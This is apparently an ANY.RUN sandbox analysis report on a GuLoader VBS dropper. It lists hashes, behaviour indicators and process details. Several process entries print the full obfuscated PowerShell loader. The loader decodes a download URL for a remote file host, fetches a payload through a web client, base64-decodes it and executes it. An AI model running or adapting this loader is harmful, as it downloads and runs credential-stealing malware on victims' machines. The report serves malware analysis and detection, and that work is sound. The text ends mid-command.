File name:

Gymnasielrere84.vbs

Full analysis: https://app.any.run/tasks/72fad8a6-bb32-46be-8811-22a8d3005aee
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: September 22, 2024, 17:41:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
loader
lokibot
stealer
xor-url
generic
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

0D5AA3C54F12FB3D254DC0ED6F946D2E

SHA1:

04D6915391BC112A8DCC482616473D21E67209AC

SHA256:

8B496E6F6FA5824FC7A95DC9844FDCBBB3D8ABB215476FFC2E2ABE0142BE0447

SSDEEP:

384:Z9vOg3hVg1cC9a4pYTagc3NE7p5sUm5zSouEDfvl/7GRh/DvvxsWoutDwTK:Zp3hzC9aqYTEZUKXDfN/7GR1zxsODb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GULOADER has been detected

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)

    • XORed URL has been found (YARA)

      • wabmig.exe (PID: 7036)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6916)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6916)
      • cmd.exe (PID: 4288)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1148)
      • powershell.exe (PID: 6340)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1148)
      • powershell.exe (PID: 6340)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 1148)

    • Executable content was dropped or overwritten

      • wabmig.exe (PID: 7036)

    • Process drops legitimate windows executable

      • wabmig.exe (PID: 7036)

  • INFO

    • The process uses the downloaded file

      • wscript.exe (PID: 6916)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6916)
      • cmd.exe (PID: 4288)

    • Disables trace logs

      • powershell.exe (PID: 6340)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6340)
      • powershell.exe (PID: 1148)

    • Checks proxy server information

      • powershell.exe (PID: 6340)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1148)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 1148)
      • powershell.exe (PID: 6340)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
127
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs #GULOADER powershell.exe conhost.exe no specs cmd.exe no specs cmd.exe no specs #GULOADER powershell.exe no specs cmd.exe no specs #XOR-URL wabmig.exe

Process information

PID
CMD
Path
Indicators
Parent process
1148"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1640"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4288"C:\WINDOWS\system32\cmd.exe" /c ^"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
4772"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
6340"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Arapunga Screenland Manerlig Ransage Underdaniges #>;$Anacanthous='Startsymbolernes';<#Laboratorietekniker Kommunalforvaltningen Gravskndere Ringene #>;$Talstrkest=$host.PrivateData;If ($Talstrkest) {$Hjrnetnder++;}function Klanens($Tamgs){$Hviskhedernes=$Tamgs.Length-$Hjrnetnder;for( $Awaredom=5;$Awaredom -lt $Hviskhedernes;$Awaredom+=6){$Strintes+=$Tamgs[$Awaredom];}$Strintes;}function Unslyness($Tankrensninger){ . ($Sunbelts) ($Tankrensninger);}$Monoscelans=Klanens 'Si uaMMo,eho N utz SejriCarl,lUnkenlKibitaSynba/ ampa5 tnin.Slaae0Frers Up a(Jac tWDamkuiTrfsanFejlmdOuranoUdvekwHypn s.anne OsterNS.manT Insu Egual1Coemp0Kanes.Reprs0W.llo;Klage GlummWP,lisiEsma nV der6 agt4 Syze; eskf Semimx Aut,6S and4 igit;Koran rivvrTikr.v ull:Syned1 Roma2C unt1F und.Sna,p0 Arki)An.id HoveGoutswe ieldc eclakWanseo Bru /Jumbl2V.ric0Block1Fste.0Kobli0Svige1Opvas0Tjene1Tosta SubscFNedtri GummrBypareS,uabfProweoEmbedxAnder/Gelat1Conci2Verde1Mytho.Vacon0Pachy ';$Afsendelsesprioriterings=Klanens 'MakefuUnsh SIdyllE For rHussp-DistraPostsG DioeeReconnTi liTCur.y ';$Troutier186=Klanens 'P rsohRetrut Di ttathe,p,umalsN.nco:Ornam/botan/KiessdBillerGuaraiPr,ntviris e Kapp. FestgEgilaoFingeo overgOpdyrl NotoeHersk.Habi.cBlindoSpgenm Milj/FilliuCivilcSigna?Ansgne,prngx DarlpSnus oag vrr.agtktPhlyz=Fri,rdTyroloNormawtheeznPyroml Panto RelaaResuldRatsb& lektiBipardDaske=Korsv1PodanlTurgeIFu.kt7BulnuSMindeo prebYHerenb Gear_.eartaHelenB ,arnEJulefmArthrRPi,oamRi.esJgroo JSigg I,crum-Lik euUn ov3Unn,u1FemhuJ PulcgTaa swChorutMul iX rapsJNitteMMo dtn ook_Ti.amQDukkem Rola ';$Papermouth=Klanens 'frist> Joyc ';$Sunbelts=Klanens ' ravii Dat.ea.shaxMilie ';$Jochums='tragicomedies';$Energiministre222 = Klanens 'Anfrse ibboc ategh TonaoRense paga %Endoca,idsspForhap llerdIndsvaCa.ictabuliaVandr%Rvful\ SingTUri,rrTil.rkAntiliHat hsColovt WatceunflorMuha nWaldmeB.dfasLemon.kajplB nterr B,sikDissi Re r&uvish&Mord. MassieHibaccFja,thDysmooSkinn For rtHenst ';Unslyness (Klanens 'S rud$S.gnagBoguslDest,oDehisbs.mmeaKlassl Ho.l:RektiFDieneoSol,erCodele F.skb MadcyHypofgC,lubgOver.eDisabnSt.kkdMussyeMushrsPolyp=Manna( dgrac Travm R endDa ne arr/Mithrcs vef op.ta$HvideEWhelknMottle erisr Vejkglr aniPlan mEnwheiStrukn Glutib.ngasL vsst S mmrClasseDi ne2St mf2 Lege2Egenn)Bkken ');Unslyness (Klanens 'Prod $NaphtgHai elBrugeoEpistb,enseaBereglGurly:Rdt.rPKvator Veino ChifcApae tTu kei Uk,ttthirsiBippesSwell=Chick$waitiTOsteorRo gho uppluMilitt Baldi SikreTelear Con 1Taxic8I.ves6notal.BssemssociapMeanilChamaiThirtt ndua(s att$SunshPTreskaTetrapcelebeEnr vrVaab mUnosto Mar uForlatTapr,h Isla)Ba si ');Unslyness (Klanens 'Bloms[ sam NMes,ieHaplotoutdr.St keSege.teBetalrDalhovUnde iDronecHypereSko.kPOver oBastiiSeppanAknowt histM Kvaka TreanPreexa Fo kg BruteSojabrBemgt]Ski f:Dybfr:InstaSTvaere Mir,c blinuTinglrDualiiSemivtOmfavyUnw.iPHumplrOvul oAnti t IrisoSelv,cSwishoCitrilB man Indta= Inko nd,s[MaaseNAssu eSmr atVagui.PlataS ircueComptcKoffauAmbitr S jliKultitNonbeyChemiPFiskerAnviso Trift SultoColumcT maroDipl l ArraTHelicyFuldap VarieOve,b]Incus:Cent,:bukkeT Cymbl pra sS.dko1 Real2Ru em ');$Troutier186=$Proctitis[0];$Kirkegaardsjorde= (Klanens 'Clogs$ForviGFir.ml VadeOMod,sBBrodsa Fen lAlpha: CambVOmb tiRi gnecon,uL recuSFlydeE KnigsRente=RadikNSln ke,yrlawEu ar-PolyhOBulksbSummojKo cieFluorCTarlaTpolar Colo,SKompeYMadlaS angtS.attETwinsMplati.PlacenSand,e.ommaT Seam.Uf,rsWFeminE .ckpB dveCEnverL Fod iSuperEAir un,eremT');$Kirkegaardsjorde+=$Forebyggendes[1];Unslyness ($Kirkegaardsjorde);Unslyness (Klanens 'Begre$Fa tiV AdieiCelleeBlodpl isposAfstieRiotpssenti. ubtuHHead eE icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor 